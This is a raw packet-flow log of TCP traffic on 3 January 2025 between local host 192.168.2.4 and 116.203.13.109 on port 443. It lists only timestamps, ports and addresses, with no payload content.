Jan 3, 2025 14:30:57.873615026 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873635054 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873672962 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873687029 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873712063 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:57.873728037 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:57.873747110 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:58.442146063 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:58.442205906 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:58.442219019 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:58.442231894 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:58.442275047 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:58.508061886 CET	49784	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:58.508075953 CET	443	49784	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.121368885 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.121440887 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.121491909 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.121531010 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.125206947 CET	49793	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.125231028 CET	443	49793	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.328033924 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.328062057 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.328165054 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.328419924 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.328432083 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.985276937 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.989470959 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.990008116 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.990014076 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.991764069 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.991769075 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.991839886 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.991858959 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.991863966 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.991868019 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.991931915 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.991945982 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.991952896 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.991965055 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992026091 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992037058 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992053986 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992083073 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992141008 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992151976 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992161989 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992185116 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992202044 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992214918 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992244959 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992257118 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992285013 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992295980 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992362976 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992372036 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992387056 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992392063 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992403984 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992413044 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992429972 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992441893 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:59.992460012 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992468119 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992479086 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992522955 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992556095 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:59.992590904 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.002059937 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005055904 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005063057 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005220890 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005232096 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005315065 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005322933 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005337954 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005345106 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005383968 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005394936 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005399942 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005403042 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005413055 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005423069 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005511999 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005517960 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005532980 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005542040 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005574942 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005587101 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005625010 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005635977 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005655050 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005671978 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005712032 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005723953 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005743027 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005754948 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005790949 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005798101 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005834103 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005845070 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.005851984 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005868912 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005913973 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005920887 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005942106 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.005969048 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006000042 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006042004 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006091118 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006169081 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006215096 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.006710052 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.007812977 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.007924080 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.007930994 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.007941008 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.007956028 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.007975101 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.007986069 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.008050919 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008058071 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.008075953 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008100033 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008158922 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008173943 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008212090 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008255959 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008299112 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008310080 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.008362055 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.020689011 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.020725965 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.020912886 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.020930052 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.021018982 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021030903 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.021063089 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021110058 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021120071 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021138906 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021167994 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021202087 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021239042 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021261930 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021281958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021291018 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.021326065 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.026827097 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.029373884 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029381037 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.029392958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029434919 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029476881 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029509068 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029515982 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029525995 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029573917 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029603958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029618979 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029627085 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.029669046 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.036307096 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.056339025 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.057154894 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057167053 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.057194948 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057236910 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057280064 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057315111 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057321072 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057329893 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057372093 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057408094 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057418108 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.057467937 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.067572117 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.088222980 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.089432001 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089446068 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.089495897 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089534998 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089575052 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089612007 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089641094 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089683056 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089715958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089751005 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.089788914 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094244003 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.094532013 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.094633102 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094640970 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094664097 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094695091 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094724894 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094763041 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094803095 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094810009 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094820976 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094861031 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.094892979 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.098802090 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.098980904 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099081993 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099093914 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099136114 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099147081 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099163055 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099173069 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099210024 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099220991 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099231958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099241972 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.099282980 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099319935 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099347115 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099378109 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099411011 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099443913 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099481106 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099488974 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099513054 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.099539995 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.101689100 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.101782084 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.101843119 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.101849079 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.101891041 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.101903915 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.101918936 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.101928949 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.101986885 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.101998091 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.102008104 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102062941 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102094889 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102127075 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102154970 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102197886 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.102211952 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.114448071 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.147326946 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.147624016 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.147723913 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.147739887 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.148082018 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148093939 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.148099899 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148113966 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148159981 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148197889 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148226023 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148267031 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148300886 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.148329973 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.161333084 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.179718018 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.179827929 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.179846048 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.179869890 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.179897070 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.179904938 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180022955 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180035114 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180082083 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180093050 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180135012 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180146933 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180214882 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180224895 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180248022 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180254936 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180301905 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180313110 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.180371046 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180418015 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180475950 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180507898 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180562973 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.180578947 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.192568064 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.220426083 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220498085 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220679998 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220710993 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.220758915 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220781088 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.220813990 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.220822096 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220845938 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.220927954 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.220990896 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.221091986 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.221111059 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.221239090 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.241786003 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.241833925 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.242031097 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.242080927 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.242207050 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.242238998 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.242249012 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.242366076 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.287333965 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.287461042 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.287496090 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.289891958 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.289905071 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.289987087 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.290009022 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.290143013 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.290245056 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.290281057 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.290308952 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.293370962 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.293397903 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.297394991 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.297425032 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.309720993 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.309732914 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.309818983 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.309834003 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310050964 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310153008 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310169935 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310184002 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310199976 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310209036 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310220957 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310252905 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310256004 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310293913 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310297966 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310307026 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310312986 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310321093 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310340881 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.310359001 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310372114 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.310379982 CET	49806	443	192.168.2.4	116.203.13.109
